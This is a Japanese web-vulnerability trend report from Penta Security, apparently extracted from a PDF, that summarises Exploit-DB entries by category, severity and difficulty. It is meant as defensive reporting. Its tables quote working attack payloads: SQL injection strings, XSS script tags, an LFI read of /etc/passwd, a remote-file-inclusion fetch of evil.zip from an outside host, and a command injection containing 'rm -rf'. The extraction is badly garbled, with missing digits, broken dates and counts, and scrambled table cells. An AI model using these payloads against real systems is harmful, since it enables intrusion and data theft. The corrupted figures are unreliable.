06.0
最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 月に公開された Exploit-DB の分析の結果 SQL Injection 攻撃に対する脆弱性報告数が最も多かったです 分析された SQL Injection 攻撃は 攻撃難易度の側面では単なる攻撃の成功可否を問うクエリーを使用して攻撃が行われる難易度の低い攻撃が大半でしたが 危険度の側面ではともに高い攻撃でした 該当脆弱性が発見されたソフトウェアを使用する管理者は対象モジュール及びプラグインに入力値検証をさらに厳しくするセキュリティパッチおよびセキュアコーディングを行い SQL Injection 攻撃に露出されないよう注意しなければなりません SQL Injection の他 最近になって Code Injection と関連した脆弱性が周期的に現れています PHP Code Injection は SQL Injection と Command Injection に比べ 相対的に危険度が低い脆弱性に属しますが 相変わらず多くの Web サイトが PHP で構成されていて PHP 当該サイトは Code Injection に簡単に露出される可能性があります PHP Code Injection も SQL Injection と同じく ユーザの入力値を厳しく検証して 悪意的なコードが実行されないよう注意しなければなりません. 脆弱性別件数 脆弱性カテゴリ 件数 ローカルファイル挿入 (Local File Inclusion:LFI) コマンドインジェクション (Command Injection) コード インジェクション (Code Injection) RFIリモートファイル挿入 (Remote File Inclusion:RFI) クロスサイトスクリプティング (Cross Site Scripting : XSS) 8 SQL インジェクション (SQL Injection) 5 合計 8 脆弱性別件数 8 5 6 0 8 6 0. 危険度別件数 危険度 件数 割合 早急対応要 7 5% 高 75% 合計 8 00% 危険度別分類 7 早急対応要 高 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 7% 中 % 易 79% 合計 8 00% 攻撃実行の難易度別件数 難 中 易. 主なソフトウェア別脆弱性発生件数ソフトウェア名 Open Audit SeaWell Networks 合計 件数 3 8 主なソフトウェア別脆弱性発生件数 Open Audit 3 SeaWell Networks Copyright 06 Penta Security Systems Inc. All rights reserved
最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 危険度分類基準早急対応要 : 攻撃が成功した場合システムへ侵入可高 : システム情報を取得するか あるいはクライアントに 次被害を及ぼす 中 : 情報漏洩攻撃実行難易度分類基準難 : 複数の脆弱性を突いた攻撃パターン 対象のシステムの重要な情報を取得するため 高度な攻撃コードを採用したパターン 知らされていない攻撃コードを採用したパターンのいずれかに該当する中 : 攻撃手法自体は難しくないが 迂回コードを採用したパターン易 : 回のリクエストで攻撃が成立するパターン 複数回トライするも 既知の攻撃コードを採用したパターンのいずれかに該当する ** 5 件以上発生した主なソフトウェア別脆弱性の詳細情報 EDB 番号脆弱性カテゴリ攻撃難易度危険度脆弱性名ソフトウェア名 Copyright 06 Penta Security Systems Inc. All rights reserved
日付 EDB 番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境 06-0-0 3950 SQL Injection 易 高 software_add_license.php SQL /software_add_license.php?id=%0and%0=-- Open Audit Open Audit 06-0-0 3950 SQL Injection 易 高 delete_system.php SQL /delete_system.php?pc=%0and%0=-- Open Audit Open Audit 06-0-0 3950 SQL Injection 易 高 /list_viewdef_software_for_system.php?pc=%0and list_viewdef_software_for_sys %0=-- Open Audit Open Audit 05-0-0 3950 SQL Injection 易高 06-0-05 397 XSS 易高 EDB-Report 最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です tem.php SQL system_export.php SQL..00 - logincheck.php XSS 脆弱性 /system_export.php?pc=%0and%0=-- Open Audit Open Audit POST /phpipam/site/login/logincheck.php HTTP/. Chrome/6.0.9.75 Safari/535.7..00 06-0-05 397 XSS 易高..00 - logincheck.php XSS 脆弱性 ipamusername=<script>alert("rxss0")</script>&ip ampassword=xxx POST /phpipam/site/login/logincheck.php HTTP/. Chrome/6.0.9.75 Safari/535.7..00 06-0-05 3968 SQL Injection 易高 - manage-profile.php SQL ipamusername=<script>alert("rxss0")</script>&ip ampassword=xxx POST /manage-profile.php HTTP/. Chrome/6.0.9.75 Safari/535.7 06-0-05 3968 SQL Injection 易高 - registeracc.php SQL Injection 脆弱性 email=' POST /registeracc.php and =-- HTTP/. Chrome/6.0.9.75 Safari/535.7 06-0-05 3968 XSS 易高 - manage-profile.php XSS email=tester%0wics.com' or updatexml(,concat(0x7e,(version())),0) or' POST /manage-profile.php HTTP/. Chrome/6.0.9.75 Safari/535.7 06-0-05 3968 XSS 易高 - registeracc.php XSS Injection 脆弱性 firstname=wics&lastname=wics&email=<script>alert (document.location)</script>&password=admin&conf POST /registeracc.php HTTP/. Chrome/6.0.9.75 Safari/535.7 06-0-08 390 XSS 易高 WP Symposium Pro Social Network Plugin 5. - wps_usermeta_shortcodes.ph p XSS 脆弱性 firstname=wics&lastname=wics&email=<script>alert ();</script>&password=admin&confirmpassword=a POST /wps_usermeta_shortcodes.php HTTP/. Chrome/6.0.9.75 Safari/535.7 WP Symposium Pro Social Network Plugin 5. wpspro_country="><script>alert("")</script><" Copyright 06 Penta Security Systems Inc. All rights reserved
最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 日付 EDB 番号脆弱性カテゴリ攻撃難易度危険度脆弱性名攻撃コード対象プログラム対象環境 06-0- 393 Code Injection 易高 NMS <= 5.3.6.0 - kill.php Code POST /doms/discoveryqueue/kill.php HTTP/. Chrome/6.0.9.75 Safari/535.7 NMS <= 5.3.6.0 06-0- 393 Command Injection 中早急対応要 pids[]=echo phpinfo(); POST /doms/discoveryqueue/kill.php HTTP/. NMS <= 5.3.6.0 - Chrome/6.0.9.75 Safari/535.7 kill.php Command Injection 脆 弱性 NMS <= 5.3.6.0 06-0-5 396 SQL Injection 難早急対応要.xls Bitrix Module 6.5. - _xls_import.php SQL pids[]=python /tmp/sess_ap6kducbetfk9fhcqdnk0be5; rm -rf /bitrix/admin/_xls_import.php?del_prof_real=& xls_profile=%7%0or%0=(select%0load_file(c ONCAT(CHAR(9),CHAR(9),(select%0version()),CH AR(6),CHAR(97),CHAR(6),CHAR(6),CHAR(97),C HAR(99),CHAR(07),CHAR(0),CHAR(),CHAR(6 ),CHAR(99),CHAR(),CHAR(09),CHAR(9),CHAR( 0),CHAR(),CHAR(),CHAR(98),CHAR(97),CH AR())))+--+.xls Bitrix Module 6.5. 06-0-5 396 SQL Injection 難早急対応要.xls Bitrix Module 6.5. - _xls_import_step_.php SQL /admin/_xls_import_step_.php?save_profile=y &make_translit_code=y&xls_iblock_id=0,0,0,0,0,0,0,0,0,(select%0load_file(concat(char(9),char(9), (select%0version()),char(6),char(97),char(6),char(6),char(97),char(99),char(07),char( 0),CHAR(),CHAR(6),CHAR(99),CHAR(),CHA R(09),CHAR(9),CHAR(0),CHAR(),CHAR(), CHAR(98),CHAR(97),CHAR())))%9+-- +&xls_iblock_section_id=0&xls_identify=0&firstro w=0&titlerow=0&firstcolumn=0&highestcolumn=0& XLS_GLOBALS=0&sku_iblock_id=&cml_link_code= &xls_iblock_section_id_new=0.xls Bitrix Module 6.5. 06-0-8 3966 LFI 易早急対応要 SeaWell Networks Spectrum - configure_manage.php LFI 脆弱性 /configure_manage.php?action=download_config&file =../../../../../../../../../etc/passwd SeaWell Networks SeaWell Networks Spectrum 06-0-8 3963 RFI 易高.0.9 - index.php RFI 脆弱性 POST /index.php?act=admin&adact=skin&seadact=import HTTP/. Chrome/6.0.9.75 Safari/535.7.0.9 folderpath=../&importtype=&weburl=http://hyp3rlin x.altervista.org/evil.zip&filepath=../&uploadtheme=&i mportskin=import 06-0-8 396 XSS 易高.0.9 - index.php XSS 脆弱性 POST /index.php?act=admin&adact=skin&seadact=import HTTP/. Chrome/6.0.9.75 Safari/535.7.0.9 06-0-5 39309 SQL Injection 中早急対応要 fredirect="/><script>alert("xss Booking Calendar /wordpress/wp-admin/adminajax.php?action=cpabc_appointments_check_ipn_veri Contact Form Plugin <=..3 - admin-ajax.php SQL fication&cpabc_ipncheck=&itemnumber=(select * FROM (SELECT(SLEEP(5)))Qmyx) Booking Calendar Contact Form Plugin <=..3 Copyright 06 Penta Security Systems Inc. All rights reserved
最新 Web 脆弱性トレンドレポート (06.0) 06.0.0~06.0.3 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいた脆弱性トレンド情報です 日付 EDB 番号脆弱性カテゴリ攻撃難易度危険度脆弱性名攻撃コード対象プログラム対象環境 06-0-7 393 XSS 易高 WordPress Booking Calendar Contact Form <=.. - admin.php XSS 脆弱性 /wpadmin/admin.php?page=cpabc_appointments&ac=st& chs=utf- 8&ict=%%3E%3Cimg+src%3Dx+onerror%3Dalert %8%9%3E&ics=%%3E%3Cimg+src%3Dx+one rror%3dalert%8%9%3e&scr= WordPress Booking Calendar Contact Form <=.. 06-0-7 39339 SQL Injection 中早急対応要 06-0-7 39339 XSS 易高 06-0-8 39355 RFI 易高 06-0-8 3935 SQL Injection 易高 06-0-9 39385 SQL Injection 中早急対応要 BK Mobile jquery CMS. - gallery.php SQL BK Mobile jquery CMS. - gallery.php XSS 脆弱性 Ramui Web Hosting Directory Script.0 - connection.php RFI 脆弱性 /user/gallery.php?g_name=%7%0union%0all% 0select%0,,3,group_concat%8version%8%9 %9,5--+ /user/gallery.php?g_name=%3cscript%3ealert%8 %XSS%%9%3C/script%3E /gb/include/connection.php?root=http://test.com.inde x.php Ramui Forum Script 9.0 - /gb/include/page.php?pagename=%0and%0=- page.php SQL - r58 - managefiles.php SQL POST /manage-files.php?client_id= HTTP/. Chrome/6.0.9.75 Safari/535.7 BK Mobile jquery CMS. BK Mobile jquery CMS. Ramui Web Hosting Directory Script.0 Ramui Forum Script 9.0 r58 06-0-9 39385 SQL Injection 易高 r58 - clients.php SQL status=0' and 0 union select 0,,'0) or union select POST /clients.php HTTP/. Chrome/6.0.9.75 Safari/535.7 r58 06-0-9 39385 SQL Injection 易高 06-0-9 39385 SQL Injection 易高 r58 - rocess-zipdownload.php SQL Injection 脆弱性 r58 - homelog.php SQL status=' and =-- /rocess-zipdownload.php?file=%7%0and%0=--%0 /home-log.php?action=%7%0and%0=--%0 r58 r58 Copyright 06 Penta Security Systems Inc. All rights reserved